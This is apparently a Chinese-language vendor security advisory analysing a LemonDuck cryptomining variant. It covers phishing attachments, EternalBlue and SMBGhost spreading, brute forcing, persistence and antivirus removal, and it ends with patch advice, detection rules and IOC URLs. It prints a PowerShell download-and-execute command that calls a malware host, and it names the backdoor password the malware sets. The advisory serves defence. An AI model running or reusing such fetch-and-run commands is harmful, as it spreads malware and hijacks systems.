「安全通告」新版「LemonDuck」搭載「永恆之藍」,新增EXE攻擊模塊...

安全通告

近日，亞信安全截獲「LemonDuck」（檸檬鴨）挖礦病毒的最新變種文件，該變種啟用Python打包可執行文件方式進行網絡攻擊，重新將永恆之藍漏洞攻擊、SMB、MSSQL爆破攻擊的代碼添加到可執行文件中，結合之前的PowerShell腳本進行混合攻擊。失陷後的系統會下載if.bin和<random>.EXE攻擊模塊進行大規模的漏洞掃描和攻擊傳播，中毒系統最終用於下載運行門羅幣挖礦木馬。

攻擊流程

病毒詳細分析

該病毒執行後自動查找當前用戶的郵箱通訊錄並發送隨機主題的郵件，郵件附件文檔名為readme.doc和readme.zip，相關代碼如下：

形成釣魚郵件如下：

其中，附件文檔附帶CVE-2017-8570漏洞，如果被攻擊用戶收到郵件並不慎打開文檔後，釋放的Package對象中的Scriptletfile(.sct)腳本文件會自動釋放到%tmp%目錄下：

插入的Package對象實際上是一個惡意Scriptletfile(.sct)腳本文件：

如果沒有更新補丁修復Scriptletfile功能，就可能觸發漏洞執行PowerShell命令執行惡意代碼。釣魚郵件另一個附件中加入了「readme.zip」，解壓後是一個惡意的JS文件「readme.js」，該JS文件開頭為「//This File is broken.」，中間被插入大段空白，惡意代碼內容在文件尾部，運行後會連結地址下載惡意腳本：http[：]//t.tr2q.com/mail.jsp

創建計劃任務下載的http[：]//t.amynx.com/a.jsp文件會下載if.bin和kr.bin以及m6.bin和m6g.in等挖礦程序：

其中攻擊模塊if.bin在smbghost_exec函數中利用從hxxp：//d.ackng.com/smgh.bin下載的SMBGhost漏洞攻擊程序發起攻擊，攻擊成功後遠程執行以下shellcode：powershell IEx(New- ObjectNet.WebClient).DownLoadString(''http[：]///t.amynx.com/smgho.jsp?0.8*%computername%'')

同時，發起針對Linux的SSH爆破，掃描22埠進行探測，針對Linux系統root用戶，嘗試利用弱密碼進行爆破連接，爆破登陸成功後執行遠程命令：

然後，在攻擊後執行的Payload中添加一行代碼，負責下載和執行EXE攻擊模塊：http[：]//d.ackng.com/ode.bin

而Ode.bin文件的功能為生成4到8位字符組成的隨機字符作為文件名<隨機字符>.exe；從http[：]//167.71.87.85/20.dat地址下載文件另存為C：\Windows\Temp\<random>.exe同時創建計劃任務"\Microsoft\Windows\<隨機字符>.exe"並間隔50分鐘執行一次，如不能創建計劃任務則生成C：\Windows\Temp\tt.vbs文件，通過VBS腳本創建計劃任務「<隨機字符>.exe"，達到定時啟動的目的。

通過計劃任務執行的20.dat(拷貝至C：\Windows\Temp\<random>.exe md5：ef3a4697773f84850fe1a086db8edfe0)實際上是由Python代碼打包的掃描攻擊模塊。<random>.exe中解碼出Python實現的永恆之藍漏洞攻擊代碼如下，另外還會執行$IPC、SMB、mssql弱口令爆破攻擊：

攻擊成功後執行shellcode：

1、下載和執行Powershell代碼gim.jsp；

2、修改administrator帳戶登陸密碼為k8d3j9SjfS7並激活administrator帳戶；

3、添加防火牆規則允許65529埠訪問並開啟監聽。

gim.jsp是經過加密的PowerShell代碼，首先檢測系統是否安裝了以下殺軟，如有調用卸載程序進行卸載：

然後安裝一個計劃任務「blackball」和一個隨機名計劃任務，定期下載和執行a.jsp繼續下載和執行挖礦和攻擊模塊：

同時會將「永恆之藍」下載器歷史版本安裝的計劃任務「Rtsa」、「Rtsa1」、「Rtsa2」刪除，封閉445和135埠，添加防火牆規則允許訪問和監聽65529埠並禁止SMB的壓縮功能：

亞信安全教你如何防範

不要點擊或打開來源不明的郵件、附件以及郵件中的連結；採用高強度的密碼，避免使用弱口令密碼，並定期更換密碼；打開系統自動更新，並檢測更新進行安裝；針對使用445埠的業務，進行權限限制；保持安全產品的部署及相關組件的更新；如無需使用，禁用PowerShell功能；系統打上MS17-010對應的Microsoft Windows SMB伺服器安全更新(4013389)補丁程序詳細信息，參考連結：https：//technet.microsoft.com/library/security/MS17-010 XP和部分伺服器版WindowsServer2003特別安全補丁，詳細信息請參考連結：https：//blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/系統打上CVE-2019-0708 RDP服務遠程代碼執行漏洞補丁：https：//portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708系統打上CVE-2017-8464 LNK遠程執行代碼漏洞補丁：https：//portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464建議安裝如下補丁防止Mimikatz竊取本機密碼：https：//support.microsoft.com/zh-cn/help/2871997/microsoft-security-advisory-update-to-improve- credentials-protection-a

亞信安全產品解決方案

拿到樣本的第一時間，亞信安全DDAN沙盒平臺已經可以檢測出惡意行為：

亞信安全病毒碼版本16.103.60，雲病毒碼版本16.103.71，全球碼版本16.103.00已經可以檢測，請用戶及時升級病毒碼版本。

亞信安全OSCE VP / DS DPI 開啟以下規則攔截該漏洞：

1008225 - Microsoft Windows SMB Remote Code Execution Vulnerability (CVE-2017-0145)1008227 - Microsoft Windows SMB Information Disclosure Vulnerability (CVE-2017-0147)1008228 - Microsoft Windows SMB Remote Code Execution Vulnerability (CVE-2017-0148)1008306 - Microsoft Windows SMB Remote Code Execution Vulnerability (MS17-010)1008585 - Microsoft Windows LNK Remote Code Execution Over SMB (CVE-2017-8464) 1008623-Microsoft Office Remote Code Execution Vulnerability (CVE-2017-8570)1009749 - Microsoft Windows Remote Desktop Services Remote Code Execution Vulnerability (CVE- 2019-0708)1008224 - Microsoft Windows SMB Remote Code Execution Vulnerabilities (CVE-2017-0144 and CVE- 2017-0146)

亞信安全深度發現設備TDA檢測規則如下：

2383：CVE-2017-0144-Remote Code Execution-SMB(Request)

亞信安全DeepEdge已發布針對CVE-2017-0144漏洞的4條規則：

名稱：微軟MS17 010 SMB 遠程代碼執行1-4，規則號：1133635,1133636,1133637,1133638

IOCs

URL：

hxxp[：]//d.ackng.com/if.bin

hxxp[：]//d.ackng.com/kr.bin

hxxp[：]//t.amynx.com/a.jsp

hxxp[：]//167.71.87.85/20.dat

hxxp[：]//d.ackng.com/ode.bin

hxxp[：]//t.amynx.com/gim.jsp

hxxp[：]//t.amynx.com/smgho.jsp